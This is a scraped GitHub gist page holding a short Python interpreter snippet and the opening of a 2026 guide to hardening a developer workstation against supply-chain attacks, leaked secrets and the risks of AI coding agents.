Open this in zkREPL →
This file can be included into other zkREPLs with include "gist:4149b97a72b4f51714620ecfaaf139fc";
lajarre
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from datatypes import Atom, List, Expression | |
| class Interpreter: | |
| class InterpreterError(Exception): | |
| pass | |
| PROC_MAPPING = {"+": lambda *args: sum(args)} | |
| ast: Expression |
lajarre
/ about_zkrepl.md
Last active
January 7, 2025 19:14
lajarre
/ workstation-security-guide.md
Created
April 1, 2026 09:51
Securing a developer workstation in 2026 — practical guide covering supply chain attacks, secrets hygiene, SSH keys, and AI agent risks
Supply chain attacks against package registries are no longer exotic. In Q1 2026 alone: LiteLLM's PyPI package was compromised, a worm self-propagated through npm (CanisterWorm), install-hook exploits hit the npm ecosystem (PhantomRaven / Shai-Hulud 2.0), and the axios maintainer account was taken over to push a RAT dropper.
The common thread: your machine trusts upstream by default, and a single poisoned dependency or stolen credential can cascade into full compromise.
When coding agents enter the picture — Pi, Claude Code, Cursor, Copilot, Codex, whatever comes next — the blast radius widens. Agents run with your shell, your tokens, your SSH keys, and your ambient permissions. Often autonomously, across many repos, for hours.
This is a practical guide. Each section says who it's for, how urgent it is, and what to actually do. It's based on a real hardening sprint on a macOS developer machine, not a theoretical framework.